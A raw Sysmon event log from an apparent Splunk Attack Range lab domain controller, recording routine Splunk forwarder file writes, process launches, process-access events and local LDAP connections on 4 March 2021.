14:04:51.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9D5DA498CF77AC2934D26C410FF8AC,SHA256=21FEF8ADEBEFC6DCEEC510DC1669C44FC07E3F0F95AC807C2E4F262833206591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202637Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:52.210{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D8D2C8440EC1F4D5E5CACAF09DC75F1,SHA256=E0392E216DC86A85486EA36999DE59D2E13C861C506FD113E4706A6744EF0A72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202638Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:53.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FCACFF34CAE52879931CE969A975642,SHA256=547F24AA264B59C56C518A152F59D20F816A46BFE2B3C5636178278793029700,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202641Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:50.952{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60656-false10.0.1.12-8000- 23542300x80000000000000002202640Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:54.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02AFAA7992522BBA937F95934CE865CE,SHA256=E7BABB773E4EFC37653DAA75E7E5D5CB63BA1FA8C15901ECBEB96D914D889E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202639Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:54.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDA5316A92FE80746FD31DB553D0AF66,SHA256=57526C2AABBCE873A9CB39881679E1C894F71EEC7C4BC72EB63A193CC77F0F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202643Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:55.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51EBF3EAFD8A1DE95F6059C35A1DC43E,SHA256=55FFC1C71D5B399199FD9759742AC036AC0D88F459893DE54673F00C1509B384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202642Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:55.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01C15BC9454DABD99A67881C3147189,SHA256=EC88AAAB09F086CB98D666DA809C8A83FE32B9572FDCB8E917356708FE6E8851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202644Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:56.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD6FD0B87D99E1B92BB5D4333C6DF1F,SHA256=EF71E32618B75BC04FC58F5DA87A16E9DD66E7B23B81DDCB90E3DBBEA77C3061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202646Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:57.257{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBC42E169854E1059941BE6EF66251EE,SHA256=050C967129131201C4DF474E6C2B93F8A806393EA8A8A4F3AEA6ED7802799C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202645Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:57.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=196EFB095731F980747B0AE32F421627,SHA256=A561B782B18255204C65D87B281CBAF539C00480F2C336D42DD894C581ABC414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202649Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:58.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=528B63E25CC751C2E8481FFB34CECBFD,SHA256=FE4749D2FF013FF099E658353C65167079D53B7F361406A0329F38CACBAF379A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202648Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:53.874{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60657-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202647Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:53.874{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60657-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202651Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:59.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0EF7377DB2086D000D9344A8E82E8CD,SHA256=960D288D83281E239DF14433B43CA0C64401A99BC999A8AA1C07D7C81DE4CA19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202650Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:59.210{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0033AE8955A6CAB56306EB65BF7A301,SHA256=E363F43A20EF7FD2D58144DA6AC79405A14BEFB7243C9E3C79BEF2675ECD61C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202653Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:00.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0996F95EF276315472C7C55C9C5202C3,SHA256=7D7F62936C22249913413037D8A902981A85BA164EBF5BFCDF7E0835C90410C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202652Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:56.015{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60658-false10.0.1.12-8000- 23542300x80000000000000002202654Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:01.288{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01B620E884A5637FD25751B5A5A0163E,SHA256=5C79508A8650FBBB0726672109B4A03E9FE6C67C10BF9A8E22D5FB8F345F5D00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.975{5ABCFE62-E90E-6040-2D4E-00000000AD01}6700424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E90E-6040-2D4E-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E90E-6040-2D4E-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.850{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E90E-6040-2D4E-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.851{5ABCFE62-E90E-6040-2D4E-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23928B03E2862E1DD11C047F60726D15,SHA256=4A6BF4E4CC22BCFACB87516CA8DCF0E44E3509D3006D03EFDF27F01616DFEEA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E90E-6040-2C4E-00000000AD01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202661Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202660Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202659Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202658Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202657Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E90E-6040-2C4E-00000000AD01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202656Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E90E-6040-2C4E-00000000AD01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202655Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:02.179{5ABCFE62-E90E-6040-2C4E-00000000AD01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E90F-6040-2E4E-00000000AD01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 